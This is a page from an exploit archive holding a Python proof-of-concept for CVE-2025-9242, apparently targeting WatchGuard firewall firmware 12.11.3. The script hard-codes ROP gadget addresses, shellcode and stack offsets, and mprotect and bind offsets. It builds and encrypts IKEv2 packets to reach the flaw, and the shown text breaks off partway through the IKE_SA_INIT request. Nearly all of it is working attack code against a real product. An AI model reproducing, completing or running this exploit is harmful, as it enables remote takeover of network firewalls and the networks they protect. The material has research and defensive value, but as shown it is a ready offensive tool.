5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / watchTowr-vs-WatchGuard-CVE-2025-9242.py PY
#!/usr/bin/env python3
import argparse
import socket
import struct
import random
import enum
import hashlib
import hmac
import logging
import base64
import binascii
import re
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend

# Configure logging
logger = logging.getLogger(__name__)

FW_VERSION = None
BUILD_NUMBER = None

class WatchGuardFw:
    ADDRESSES = {
        '12.11.3': {
            'pop_rcx_ret': 0x4225ab,                      # 0x00000000004225ab: pop rcx; ret;
            'mov_rax_rcx_ret': 0x5a4fac,                  # 0x00000000005a4fac: mov rax, rcx; ret;
            'mov_rbp_rsp_call_rax': 0x42008d,             # 0x000000000042008d: mov rbp, rsp; call rax;
            'pop_r13_ret': 0x594ac4,                      # 0x0000000000594ac4: pop r13; ret;
            'mov_rax_rbp_pop_rbx_pop_rbp_ret': 0x598d69,  # 0x0000000000598d69: mov rax, rbp; pop rbx; pop rbp; ret;
            'sub_rax_rcx_ret': 0x5a4fd8,                  # 0x00000000005a4fd8: sub rax, rcx; ret;
            'push_rax_mov_rax_rbx_pop_rbx_ret': 0x5a4468, # 0x00000000005a4468: push rax; mov rax, rbx; pop rbx; ret;
            'mov_rdi_rbx_call_rax': 0x42fce4,             # 0x000000000042fce4: mov rdi, rbx; call rax;
            'pop_rsi_ret': 0x508ece,                      # 0x0000000000508ece: pop rsi; ret;
            'pop_rdx_ret': 0x483a4a,                      # 0x0000000000483a4a: pop rdx; ret;
            'mov_rax_rax_ret': 0x5b145e,                  # 0x00000000005b145e: mov rax, qword ptr [rax]; ret;
            'jmp_rax': 0x41908f,                          # 0x000000000041908f: jmp rax;
            'jmp_rbx': 0x449ba3,                          # 0x0000000000449ba3: jmp rbx;

            'offset_data': 0x00,                          # Offset from data
            'offset_shellcode': 0x30,                     # Offset from buffer
            'offset_stack': 0x340,                        # Offset from rsp to start of buffer
            'offset_stack_page_aligned': 0x0cc8,          # Offset from rsp to start of buffer page aligned
            'offset_bind_mprotect': 0x5ea0,               # Offset from mprotect to bind in libc.so
            'got_bind': 0x658028,                         # GOT of bind
        },
    }

    def __init__(self, version):
        self.version = version
        if version not in self.ADDRESSES:
            raise ValueError(f'Unsupported WatchGuard version: {version}')
        self.addresses = self.ADDRESSES[version]

    def get(self, name, fmt='<Q'):
        return struct.pack(fmt, self.addresses[name])

    def get_i(self, name):
        return self.addresses[name]

    @staticmethod
    def has(version):
        return version in WatchGuardFw.ADDRESSES

    @staticmethod
    def version_tuple(v):
        return tuple(map(int, (v.split("."))))

class PayloadType(enum.IntEnum):
    NONE = 0
    TRANSFORM = 3
    SECURITY_ASSOCIATION = 33
    KEY_EXCHANGE = 34
    IDENTIFIER_INITIATOR = 35
    IDENTIFIER_RESPONDER = 36
    CERTIFICATE = 37
    CERTIFICATE_REQUEST = 38
    AUTHENTICATION = 39
    NONCE = 40
    NOTIFY = 41
    DELETE = 42
    VENDOR_ID = 43
    TRAFFIC_SELECTOR_INITIATOR = 44
    TRAFFIC_SELECTOR_RESPONDER = 45
    ENCRYPTED = 46
    CONFIGURATION = 47
    EXTENSIBLE_AUTHENTICATION = 48

class ExchangeType(enum.IntEnum):
    IKE_SA_INIT = 34
    IKE_AUTH = 35
    CREATE_CHILD_SA = 36
    INFORMATIONAL = 37

class TransformType(enum.IntEnum):
    ENCRYPTION_ALGORITHM = 1
    PSEUDO_RANDOM_FUNCTION = 2
    INTEGRITY_ALGORITHM = 3
    DIFFIE_HELLMAN_GROUP = 4

class NotifyType(enum.IntEnum):
    UNSUPPORTED_CRITICAL_PAYLOAD = 1
    INVALID_IKE_SPI = 4
    INVALID_MAJOR_VERSION = 5
    INVALID_SYNTAX = 7
    INVALID_MESSAGE_ID = 9
    INVALID_SPI = 11
    NO_PROPOSAL_CHOSEN = 14
    INVALID_KE_PAYLOAD = 17
    AUTHENTICATION_FAILED = 24
    SINGLE_PAIR_REQUIRED = 34
    NO_ADDITIONAL_SAS = 35
    INTERNAL_ADDRESS_FAILURE = 36
    FAILED_CP_REQUIRED = 37
    TS_UNACCEPTABLE = 38
    INVALID_SELECTORS = 39
    INITIAL_CONTACT = 16384
    SET_WINDOW_SIZE = 16385
    ADDITIONAL_TS_POSSIBLE = 16386
    IPCOMP_SUPPORTED = 16387
    NAT_DETECTION_SOURCE_IP = 16388
    NAT_DETECTION_DESTINATION_IP = 16389
    COOKIE = 16390
    USE_TRANSPORT_MODE = 16391
    HTTP_CERT_LOOKUP_SUPPORTED = 16392
    REKEY_SA = 16393
    ESP_TFC_PADDING_NOT_SUPPORTED = 16394
    NON_FIRST_FRAGMENTS_ALSO = 16395
    MOBIKE_SUPPORTED = 16396
    MULTIPLE_AUTH_SUPPORTED = 16404
    REDIRECT_SUPPORTED = 16406
    IKEV2_FRAGMENTATION_SUPPORTED = 16430
    SIGNATURE_HASH_ALGORITHMS = 16431

class ConfigurationAttribute(enum.IntEnum):
    INTERNAL_IP4_ADDRESS = 1
    INTERNAL_IP4_NETMASK = 2
    INTERNAL_IP4_DNS = 3
    INTERNAL_IP4_MBNS = 4
    APPLICATION_VERSION = 7
    INTERNAL_IP6_ADDRESS = 8
    INTERNAL_IP6_DNS = 10

class EncryptionAlgorithm(enum.IntEnum):
    ENCR_DES_IV64 = 1
    ENCR_DES = 2
    ENCR_3DES = 3
    ENCR_RC5 = 4
    ENCR_IDEA = 5
    ENCR_CAST = 6
    ENCR_BLOWFISH = 7
    ENCR_3IDEA = 8
    ENCR_DES_IV32 = 9
    RESERVED = 10
    ENCR_NULL = 11
    ENCR_AES_CBC = 12
    ENCR_AES_CTR = 13
    ENCR_AES_CCM_8 = 14
    ENCR_AES_CCM_12 = 15
    ENCR_AES_CCM_16 = 16
    ENCR_AES_GCM_8 = 18
    ENCR_AES_GCM_12 = 19
    ENCR_AES_GCM_16 = 20
    ENCR_NULL_AUTH_AES_GMAC = 21
    P1619_XTS_AES = 22
    ENCR_CAMELLIA_CBC = 23
    ENCR_CAMELLIA_CTR = 24
    ENCR_CAMELLIA_CCM_8 = 25
    ENCR_CAMELLIA_CCM_12 = 26
    ENCR_CAMELLIA_CCM_16 = 27
    ENCR_CHACHA20_POLY1305 = 28
    ENCR_AES_CCM_8_IIV = 29
    ENCR_AES_GCM_16_IIV = 30
    ENCR_CHACHA20_POLY1305_IIV = 31
    ENCR_KUZNYECHIK_MGM_KTREE = 32
    ENCR_MAGMA_MGM_KTREE = 33
    ENCR_KUZNYECHIK_MGM_MAC_KTREE = 34
    ENCR_MAGMA_MGM_MAC_KTREE = 35

class PseudoRandomFunction(enum.IntEnum):
    PRF_HMAC_MD5 = 1
    PRF_HMAC_SHA1 = 2
    PRF_HMAC_TIGER = 3
    PRF_AES128_XCBC = 4
    PRF_HMAC_SHA2_256 = 5
    PRF_HMAC_SHA2_384 = 6
    PRF_HMAC_SHA2_512 = 7
    PRF_AES128_CMAC = 8
    PRF_HMAC_STREEBOG_512 = 9

class IntegrityAlgorithm(enum.IntEnum):
    AUTH_HMAC_MD5_96 = 1
    AUTH_HMAC_SHA1_96 = 2
    AUTH_DES_MAC = 3
    AUTH_KPDK_MD5 = 4
    AUTH_AES_XCBC_96 = 5
    AUTH_HMAC_MD5_128 = 6
    AUTH_HMAC_SHA1_160 = 7
    AUTH_AES_CMAC_96 = 8
    AUTH_AES_128_GMAC = 9
    AUTH_AES_192_GMAC = 10
    AUTH_AES_256_GMAC = 11
    AUTH_HMAC_SHA2_256_128 = 12
    AUTH_HMAC_SHA2_384_192 = 13
    AUTH_HMAC_SHA2_512_256 = 14

class DiffieHellmanGroup(enum.IntEnum):
    DH_GROUP_2048_BIT_MODP = 14
    DH_GROUP_768_BIT_MODP = 1
    DH_GROUP_1024_BIT_MODP = 2
    DH_GROUP_1536_BIT_MODP = 5
    DH_GROUP_3072_BIT_MODP = 15
    DH_GROUP_4096_BIT_MODP = 16
    DH_GROUP_6144_BIT_MODP = 17
    DH_GROUP_8192_BIT_MODP = 18
    RANDOM_ECP_GROUP_256_BIT = 19
    RANDOM_ECP_GROUP_384_BIT = 20
    RANDOM_ECP_GROUP_521_BIT = 21
    DH_GROUP_1024_BIT_MODP_WITH_160_BIT_PRIME_ORDER_SUBGROUP = 22
    DH_GROUP_2048_BIT_MODP_WITH_224_BIT_PRIME_ORDER_SUBGROUP = 23
    DH_GROUP_2048_BIT_MODP_WITH_256_BIT_PRIME_ORDER_SUBGROUP = 24
    RANDOM_ECP_GROUP_192_BIT = 25
    RANDOM_ECP_GROUP_224_BIT = 26
    BRAINPOOLP224R1 = 27
    BRAINPOOLP256R1 = 28
    BRAINPOOLP384R1 = 29
    BRAINPOOLP512R1 = 30
    CURVE25519 = 31
    CURVE448 = 32
    GOST3410_2012_256 = 33
    GOST3410_2012_512 = 34
    ML_KEM_512 = 35
    ML_KEM_768 = 36
    ML_KEM_1024 = 37

class IkePacker:
    @staticmethod
    def header(initiator_spi, responder_spi, next_payload, exchange_type, message_id, version=0x20, flags = 0x08):
        # Flags: 0x08 = Initiator, No higher version, Request
        return struct.pack('>QQBBBBII', initiator_spi, responder_spi, next_payload, version, exchange_type, flags, message_id, 0)

    @staticmethod
    def payload_header(next_payload, payload, critical = 0):
        return struct.pack('>BBH', next_payload, critical, 4 + len(payload)) + payload

    @staticmethod
    def security_association(next_payload, proposal):
        return IkePacker.payload_header(next_payload, proposal)

    @staticmethod
    def proposal(next_payload, number, id, transforms = [], spi = b''):
        b_transforms = b''
        for transform in transforms:
            if isinstance(transform, IkeTransform):
                b_transforms += transform.pack()
                continue
            b_transforms += transform
        return IkePacker.payload_header(next_payload, struct.pack('>BBBB', number, id, len(spi), len(transforms)) + spi + b_transforms)

    @staticmethod
    def key_exchange(next_payload, dh_group, data, reserved = 0):
        return IkePacker.payload_header(next_payload, struct.pack('>HH', dh_group, reserved) + data)

    @staticmethod
    def nonce(next_payload, nonce):
        return IkePacker.payload_header(next_payload, nonce)

    @staticmethod
    def notify(next_payload, notify_type, data = b'', protocol_id = 1, spi_size = 0):
        return IkePacker.payload_header(next_payload, struct.pack('>BBH', protocol_id, spi_size, notify_type) + data)

    @staticmethod
    def vendor_id(next_payload, vendor_id):
        return IkePacker.payload_header(next_payload, vendor_id)

    @staticmethod
    def encrypted(next_payload, data):
        return IkePacker.payload_header(next_payload, data)

    @staticmethod
    def identification_initiator(next_payload, id_type, data, reserved=b'\x00\x00\x00'):
        return IkePacker.payload_header(next_payload, struct.pack('>B', id_type) + reserved + data)

    @staticmethod
    def certificate(next_payload, encoding, data):
        return IkePacker.payload_header(next_payload, struct.pack('>B', encoding) + data)

    @staticmethod
    def certificate_request(next_payload, type, data = []):
        return IkePacker.payload_header(next_payload, struct.pack('>B', type) + b''.join(data))

    @staticmethod
    def authentication(next_payload, authentication_method, data, reserved=b'\x00\x00\x00'):
        return IkePacker.payload_header(next_payload, struct.pack('>B', authentication_method) + reserved + data)

    @staticmethod
    def eap(next_payload, type=1, data=b'', code = 1, identifier = 1):
        return IkePacker.payload_header(next_payload, struct.pack('>BBHB', code, identifier, len(data)+5, type) + data)

    @staticmethod
    def configuration(next_payload, configuration_type, attributes = [], reserved=b'\x00\x00\x00'):
        return IkePacker.payload_header(next_payload, struct.pack('>B', configuration_type) + reserved + b''.join(attributes))

    @staticmethod
    def configuration_attribute(tag, value=b''):
        return struct.pack('>HH', tag, len(value)) + value

    @staticmethod
    def traffic_selector(next_payload, selectors = [], reserved=b'\x00\x00\x00'):
        return IkePacker.payload_header(next_payload, struct.pack('>B', len(selectors)) + reserved + b''.join(selectors))

    @staticmethod
    def traffic_selector_ipv4_address_range(start_port, end_port, start_address, end_address):
        type = 7 # TS_IPV4_ADDR_RANGE
        protocol_id = 0
        length = 16
        start_address = struct.unpack('!L', socket.inet_aton(start_address))[0]
        end_address = struct.unpack('!L', socket.inet_aton(end_address))[0]
        return struct.pack('>BBHHHII', type, protocol_id, length, start_port, end_port, start_address, end_address)

class IkeNotify:
    def __init__(self, protocol_id, message_type, spi, notification_data):
        self.protocol_id = protocol_id
        self.message_type = message_type
        self.spi = spi
        self.notification_data = notification_data

    @staticmethod
    def unpack(data):
        protocol_id, spi_size, message_type = struct.unpack('>2BH', data[:4])
        spi = data[4:4 + spi_size]
        notification_data = data[4 + spi_size:]
        return IkeNotify(protocol_id, message_type, spi, notification_data)

class IkeSecurityAssociation:
    def __init__(self, proposal):
        self.proposal = proposal

    @staticmethod
    def unpack(data):
        next_payload, critical, payload_length = IkeUnpacker.unpack_payload_header(data[:4])
        if next_payload != PayloadType.NONE:
            raise IkeException(f"Expected payload type {PayloadType.NONE} but got {next_payload}")
        if len(data) != payload_length:
            raise IkeException(f"Expected payload length {payload_length} but got {len(data)}")
        return IkeSecurityAssociation(IkeProposal.unpack(data[4:]))

class IkeProposal:
    def __init__(self, proposal_number, protocol_id, spi, transforms):
        self.proposal_number = proposal_number
        self.protocol_id = protocol_id
        self.spi = spi
        self.transforms = transforms

    @staticmethod
    def unpack(data):
        offset = 0
        proposal_number, protocol_id, spi_size, num_transforms = struct.unpack('>BBBB', data[offset:offset+4])
        offset += 4
        spi = b''
        if spi_size > 0:
            spi = data[offset:offset+spi_size]
            offset += spi_size
        transforms = []
        for i in range(num_transforms):
            transform, size = IkeTransform.unpack(data[offset:])
            transforms.append(transform)
            offset += size
        return IkeProposal(proposal_number, protocol_id, spi, transforms)

class IkeTransform:
    def __init__(self, next_payload, transform_type, transform_id, transform_attributes=None, reserved=0):
        self.next_payload = next_payload
        self.transform_type = transform_type
        self.reserved = reserved
        self.transform_id = transform_id
        self.transform_attributes = transform_attributes
    
    def __str__(self):
        if self.transform_type == TransformType.ENCRYPTION_ALGORITHM:
            attr = ''
            if self.transform_attributes != None:
                if 14 in self.transform_attributes: # Key Length
                    attr = f' ({self.transform_attributes[14]}-bit)'

            if self.transform_id in iter(EncryptionAlgorithm):
                return EncryptionAlgorithm(self.transform_id).name + attr
            return f'ENCR_{self.transform_id}{attr}'

        if self.transform_type == TransformType.PSEUDO_RANDOM_FUNCTION:
            if self.transform_id in iter(PseudoRandomFunction):
                return PseudoRandomFunction(self.transform_id).name
            return f'PRF_{self.transform_id}'

        if self.transform_type == TransformType.INTEGRITY_ALGORITHM:
            if self.transform_id in iter(IntegrityAlgorithm):
                return IntegrityAlgorithm(self.transform_id).name
            return f'AUTH_{self.transform_id}'

        if self.transform_type == TransformType.DIFFIE_HELLMAN_GROUP:
            if self.transform_id in iter(DiffieHellmanGroup):
                return DiffieHellmanGroup(self.transform_id).name
            return f'DH_{self.transform_id}'

    def pack(self):
        transform = struct.pack('>BBH', self.transform_type, self.reserved, self.transform_id)
        if self.transform_attributes:
            transform += struct.pack('>I', self.transform_attributes)
        return IkePacker.payload_header(self.next_payload, transform)

    @staticmethod
    def unpack(data):
        # Parse transform payload header
        offset = 0
        next_payload, critical, payload_length = IkeUnpacker.unpack_payload_header(data[offset:offset+4])
        offset += 4
        if next_payload != PayloadType.NONE and next_payload != PayloadType.TRANSFORM:
            raise IkeException(f"Expected payload type {PayloadType.NONE} or {PayloadType.TRANSFORM} but got {next_payload}")

        # Parse transform data
        transform_type, reserved, transform_id = struct.unpack('>BBH', data[offset:offset+4])
        offset += 4

        # Parse transform attributes if present
        transform_attributes = None
        if payload_length > 8:
            fmt, type, value = struct.unpack('>BBH', data[offset:offset+4])
            transform_attributes = {type: value}
            offset += 4
        return IkeTransform(next_payload, transform_type, transform_id, transform_attributes, reserved), offset

class IkeResponse:
    def __init__(self, initiator_spi, responder_spi, version, exchange_type, flags, message_id, length, payloads):
        self.initiator_spi = initiator_spi
        self.responder_spi = responder_spi
        self.version = version
        self.exchange_type = exchange_type
        self.flags = flags
        self.message_id = message_id
        self.length = length
        self.payloads = payloads

    def get(self, type):
        payloads = []
        for payload in self.payloads:
            if payload['type'] == type:
                payloads.append(payload['payload'])
        return payloads

class IkeUnpacker:
    @staticmethod
    def unpack_payload_header(data):
        return struct.unpack('>BBH', data[:4])

    @staticmethod
    def unpack(response):
        initiator_spi, responder_spi, next_payload, version, exchange_type, flags, message_id, length = struct.unpack('>QQBBBBII', response[:28])
        raw_payloads = response[28:]

        i = 0
        payload_type = next_payload
        payloads = []
        while i < len(raw_payloads):
            next_payload, critical, payload_length = IkeUnpacker.unpack_payload_header(raw_payloads[i:i+4])
            payload = raw_payloads[i+4:i+payload_length]

            # Parsed Types
            if payload_type == PayloadType.NOTIFY:
                payload = IkeNotify.unpack(payload)
            elif payload_type == PayloadType.SECURITY_ASSOCIATION:
                payload = IkeSecurityAssociation.unpack(payload)

            payloads.append({
                'type': payload_type,
                'critical': critical,
                'payload': payload
            })
            i += payload_length
            payload_type = next_payload

        return IkeResponse(
            initiator_spi,
            responder_spi,
            version,
            exchange_type,
            flags,
            message_id,
            length,
            payloads
        )

class IkeCrypto:
    def __init__(self):
        self.initiator_nonce = self.generate_nonce(32)
        self.responder_nonce = None
        self.initiator_spi = random.randint(0, 0xffffffffffffffff)
        self.responder_spi = 0x0000000000000000

        self.client_private_key = None
        self.client_public_key = None
        self.client_public_key_bytes = None

        self.server_public_key_bytes = None

        self.shared_secret = None
        self.skeyseed = None
        self.SK_d = None
        self.SK_ai = None
        self.SK_ar = None
        self.SK_ei = None
        self.SK_er = None

        # Encryption: AES-CBC-256, Integrity: HMAC-SHA2-256-128, DH: MODP-14, PRF: SHA256
        self.generate_keys = self.dh_modp_14_generate_keys
        self.compute_shared_secret = self.dh_modp_14_compute_shared_secret
        self.prf = self.prf_sha256
        self.encrypt = self.encrypt_aes_cbc
        self.compute_integrity = self.compute_integrity_sha256

        self.generate_keys()

    def key_exchange(self, responder_spi, responder_nonce, server_public_key_bytes):
        self.responder_spi = responder_spi
        self.responder_nonce = responder_nonce
        self.server_public_key_bytes = server_public_key_bytes

        self.shared_secret = self.compute_shared_secret()

        # Generate SKEYSEED and derive keys
        self.generate_skeyseed()
        self.derive_keys()

    def generate_nonce(self, length=32):
        """Generate a cryptographically secure nonce"""
        return random.getrandbits(length * 8).to_bytes(length, 'big')

    def dh_modp_14_generate_keys(self):
        # Generate our private key for DH exchange (MODP group 14 = 2048-bit)
        # RFC 3526 MODP Group 14 prime - The standard 2048-bit DH prime
        p_hex = 'FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF'

        self.p = int(p_hex, 16)

        # Verify this is exactly 2048 bits
        if self.p.bit_length() != 2048:
            self.p = self.p >> (self.p.bit_length() - 2048)
        
        g = 2

        # Generate our private key (random number between 1 and p-1)
        self.client_private_key = random.randint(1, self.p - 1)

        # Compute our public key: g^private_key mod p
        self.client_public_key = pow(g, self.client_private_key, self.p)

        # Convert to bytes (256 bytes for 2048-bit MODP group)
        # Calculate the required byte length for this public key
        public_key_bit_length = self.client_public_key.bit_length()
        public_key_byte_length = (public_key_bit_length + 7) // 8  # Round up to nearest byte

        # For MODP Group 14, the public key should be at most 256 bytes (2048 bits)
        # But we need to handle cases where it might be smaller
        if public_key_byte_length > 256:
            raise ValueError(f"Public key too large: {public_key_byte_length} bytes (max 256)")

        # Convert to bytes and pad with leading zeros to make it exactly 256 bytes
        self.client_public_key_bytes = self.client_public_key.to_bytes(public_key_byte_length, 'big').rjust(256, b'\x00')

    def dh_modp_14_compute_shared_secret(self):
        # Perform DH key exchange
        # Convert server's public key from bytes to integer
        server_public_key = int.from_bytes(self.server_public_key_bytes, 'big')
        
        # Compute the shared secret: server_public_key^client_private_key mod p
        dh_shared_secret_int = pow(server_public_key, self.client_private_key, self.p)

        # Convert shared secret to bytes with proper padding
        shared_secret_bit_length = dh_shared_secret_int.bit_length()
        shared_secret_byte_length = (shared_secret_bit_length + 7) // 8
        
        if shared_secret_byte_length > 256:
            raise ValueError(f"Shared secret too large: {shared_secret_byte_length} bytes (max 256)")
        
        # Convert to bytes and pad to 256 bytes
        dh_shared_secret = dh_shared_secret_int.to_bytes(shared_secret_byte_length, 'big').rjust(256, b'\x00')  # Pad to 256 bytes

        return dh_shared_secret

    def prf_sha256(self, key, data):
        """PRF using SHA256"""
        return hmac.new(key, data, hashlib.sha256).digest()

    def prf_plus(self, prf_func, key, seed, length):
        """IKEv2 PRF+ function - RFC 4306 compliant"""
        result = b''
        prev = b''
        counter = 1
        while len(result) < length:
            # RFC 4306: PRF(SKEYSEED, Ni | Nr | SPIi | SPIr | counter)
            # where counter is 1 byte and we chain the previous output
            data = prev + seed + struct.pack('!B', counter)  # 1-byte counter + chaining
            prev = prf_func(key, data)
            result += prev
            counter += 1
        return result[:length]

    def generate_skeyseed(self):
        """Generate SKEYSEED from DH shared secret and nonces"""

        # RFC 4306: SKEYSEED = prf(Ni | Nr, g^ir)
        # Key: Ni | Nr (nonces), Data: g^ir (DH shared secret)
        self.skeyseed = self.prf(self.initiator_nonce + self.responder_nonce, self.shared_secret)
        return self.skeyseed

    def derive_keys(self):
        """Derive IKEv2 keys from SKEYSEED"""
        # Create the seed for key derivation
        # RFC 4306: {SK_d | SK_ai | SK_ar | SK_ei | SK_er} = prf+(SKEYSEED, Ni | Nr | SPIi | SPIr)
        # Seed: Ni | Nr | SPIi | SPIr (nonces first, then SPIs)
        seed = self.initiator_nonce + self.responder_nonce + self.initiator_spi.to_bytes(8, 'big') + self.responder_spi.to_bytes(8, 'big')

        # Derive keys using PRF+ (PRF_HMAC_SHA2_256)
        # RFC 4306: {SK_d | SK_ai | SK_ar | SK_ei | SK_er} = prf+(SKEYSEED, Ni | Nr | SPIi | SPIr)
        # Each key is 32 bytes (SHA256 output), so we need 5 * 32 = 160 bytes total
        derived_keys = self.prf_plus(self.prf, self.skeyseed, seed, 160)  # 160 bytes total (5 * 32 bytes)

        # Split into individual keys according to RFC 4306
        self.SK_d = derived_keys[0:32]    # For deriving child SA keys
        self.SK_ai = derived_keys[32:64]  # Authentication key for initiator
        self.SK_ar = derived_keys[64:96]  # Authentication key for responder  
        self.SK_ei = derived_keys[96:128] # Encryption key for initiator
        self.SK_er = derived_keys[128:160] # Encryption key for responder

    def generate_iv(self, key, nonce):
        """Generate IV for encryption"""
        # For IKEv2, IV is typically derived from the key and nonce
        # Using a simple approach: hash of key + nonce, truncated to 16 bytes
        return hashlib.sha256(key + nonce).digest()[:16]

    def encrypt_aes_cbc(self, data, key, iv):
        """Encrypt data using AES-CBC"""
        cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend())
        encryptor = cipher.encryptor()

        # Pad data to block size (16 bytes for AES)
        padding_length = 16 - (len(data) % 16)
        padded_data = data + bytes([padding_length-1] * padding_length)

        return encryptor.update(padded_data) + encryptor.finalize()

    def compute_integrity_sha256(self, data, key):
        """Compute integrity checksum using HMAC-SHA256"""    
        return hmac.new(key, data, hashlib.sha256).digest()

class IkeException(Exception):
    pass

class IkeNoProposalChosenException(IkeException):
    pass

class IkeInvalidKEPayloadException(IkeException):
    pass

class IkeMissingNonceException(IkeException):
    pass

class IkeMissingKeyExchangeException(IkeException):
    pass

class Ike:
    def __init__(self, ip, port, timeout = 5):
        self.ip = ip
        self.port = port
        self.timeout = timeout
        self.crypto = None
        self.sock = None
        self.reset()

    @staticmethod
    def update_request_length(request):
        """Update the length field in the header"""
        total_length = len(request)
        return request[:24] + struct.pack('>I', total_length) + request[28:]

    def reset(self):
        if self.sock != None:
            self.close()
        
        self.crypto = IkeCrypto()
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.sock.settimeout(self.timeout)

    def send(self, packet):
        self.sock.sendto(packet, (self.ip, self.port))
        response, addr = self.sock.recvfrom(65535)
        return IkeUnpacker.unpack(response)

    def send_encrypted(self, exchange_type, message_id, payloads):
        # Create the IKE header first
        request = IkePacker.header(self.crypto.initiator_spi, self.crypto.responder_spi, PayloadType.ENCRYPTED, exchange_type, message_id)

        # Encrypt the inner payloads
        iv = self.crypto.generate_iv(self.crypto.SK_ei, self.crypto.initiator_nonce)
        encrypted_data = self.crypto.encrypt(payloads, self.crypto.SK_ei, iv)

        # Create the encrypted payload
        integrity_data = (b"\x00" * 16)
        request += IkePacker.encrypted(PayloadType.IDENTIFIER_INITIATOR, iv + encrypted_data + integrity_data)

        # Update the length field in the header
        request = Ike.update_request_length(request)

        # Compute integrity checksum over the entire message (including updated length, excluding integrity checksum)
        integrity_data = self.crypto.compute_integrity(request[:-16], self.crypto.SK_ai)[:16] # 16 bytes for AUTH_HMAC_SHA2_256_128

        # Replace integrity checksum
        request = request[:-16] + integrity_data

        return self.send(request)

    def close(self):
        self.sock.close()
        self.sock = None

    def sa_init(self, default_transforms = None):
        global FW_VERSION, BUILD_NUMBER

        dh_group = DiffieHellmanGroup.DH_GROUP_2048_BIT_MODP.value
        key_exchange = self.crypto.client_public_key_bytes # Group 14 = 2048 bit MODP group

        transforms = default_transforms
        if default_transforms is None:
            transforms = [
                IkeTransform(PayloadType.TRANSFORM, TransformType.ENCRYPTION_ALGORITHM, EncryptionAlgorithm.ENCR_AES_CBC.value, 0x800e0100),
                IkeTransform(PayloadType.TRANSFORM, TransformType.PSEUDO_RANDOM_FUNCTION, PseudoRandomFunction.PRF_HMAC_SHA2_256.value),
                IkeTransform(PayloadType.TRANSFORM, TransformType.INTEGRITY_ALGORITHM, IntegrityAlgorithm.AUTH_HMAC_SHA2_256_128.value),
                IkeTransform(PayloadType.NONE, TransformType.DIFFIE_HELLMAN_GROUP, DiffieHellmanGroup.DH_GROUP_2048_BIT_MODP.value),
            ]
        else:
            # If we are not using default transforms, fake the key exchange payload
            for transform in transforms:
                if transform.transform_type == TransformType.DIFFIE_HELLMAN_GROUP:
                    dh_group = transform.transform_id
            
            if dh_group != DiffieHellmanGroup.DH_GROUP_2048_BIT_MODP:
                key_sizes = {
                    8192: [
                        DiffieHellmanGroup.DH_GROUP_8192_BIT_MODP,
                    ],
                    6144: [
                        DiffieHellmanGroup.DH_GROUP_6144_BIT_MODP,
                    ],
                    4096: [
                        DiffieHellmanGroup.DH_GROUP_4096_BIT_MODP,
                    ],
                    3072: [
                        DiffieHellmanGroup.DH_GROUP_3072_BIT_MODP,
                    ],
                    2048: [
                        DiffieHellmanGroup.DH_GROUP_2048_BIT_MODP_WITH_224_BIT_PRIME_ORDER_SUBGROUP,
                        DiffieHellmanGroup.DH_GROUP_2048_BIT_MODP_WITH_256_BIT_PRIME_ORDER_SUBGROUP,
                    ],
                    1536: [
                        DiffieHellmanGroup.DH_GROUP_1536_BIT_MODP,
                    ],
                    1024: [
                        DiffieHellmanGroup.DH_GROUP_1024_BIT_MODP,
                        DiffieHellmanGroup.DH_GROUP_1024_BIT_MODP_WITH_160_BIT_PRIME_ORDER_SUBGROUP,
                        DiffieHellmanGroup.ML_KEM_1024,
                    ],
                    768: [
                        DiffieHellmanGroup.DH_GROUP_768_BIT_MODP,
                        DiffieHellmanGroup.ML_KEM_768,
                    ],
                    521: [
                        DiffieHellmanGroup.RANDOM_ECP_GROUP_521_BIT,
                    ],
                    512: [
                        DiffieHellmanGroup.BRAINPOOLP512R1,
                        DiffieHellmanGroup.GOST3410_2012_512,
                        DiffieHellmanGroup.ML_KEM_512,
                    ],
                    448: [
                        DiffieHellmanGroup.CURVE448,
                    ],
                    384: [
                        DiffieHellmanGroup.RANDOM_ECP_GROUP_384_BIT,
                        DiffieHellmanGroup.BRAINPOOLP384R1,
                    ],
                    256: [
                        DiffieHellmanGroup.RANDOM_ECP_GROUP_256_BIT,
                        DiffieHellmanGroup.BRAINPOOLP256R1,
                        DiffieHellmanGroup.CURVE25519,
                        DiffieHellmanGroup.GOST3410_2012_256,
                    ],
                    224: [
                        DiffieHellmanGroup.RANDOM_ECP_GROUP_224_BIT,
                        DiffieHellmanGroup.BRAINPOOLP224R1,
                    ],
                    192: [
                        DiffieHellmanGroup.RANDOM_ECP_GROUP_192_BIT,
                    ]
                }

                found = False
                for size in key_sizes:
                    for group in key_sizes[size]:
                        if group == dh_group:
                            key_exchange = b'\x00' * (size//8)
                            found = True
                            break
                    if found:
                        break

        # Send request and process response
        r = self.send(Ike.update_request_length(
            IkePacker.header(self.crypto.initiator_spi, self.crypto.responder_spi, PayloadType.SECURITY_ASSOCIATION, ExchangeType.IKE_SA_INIT, 0) +
            IkePacker.security_association(PayloadType.KEY_EXCHANGE, IkePacker.proposal(PayloadType.NONE, 1, 1, transforms)) +
            IkePacker.key_exchange(PayloadType.NONCE, dh_group, key_exchange) +
            IkePacker.nonce(PayloadType.NOTIFY, self.crypto.initiator_nonce) +
            IkePacker.notify(PayloadType.NOTIFY, NotifyType.NAT_DETECTION_DESTINATION_IP, bytes.fromhex('a6358d813592fdd80a9aaa3390f39c8a5a76b6e4')) +
            IkePacker.notify(PayloadType.VENDOR_ID, NotifyType.NAT_DETECTION_SOURCE_IP, bytes.fromhex('4cc324152ba3f68ef649ac1e6f96f33791611db2')) +
            IkePacker.vendor_id(PayloadType.VENDOR_ID, bytes.fromhex('c590254e5403cbb71f3d493111d7fcad')) +
            IkePacker.vendor_id(PayloadType.VENDOR_ID, bytes.fromhex('c61baca1f1a60cc10800000000000000')) +
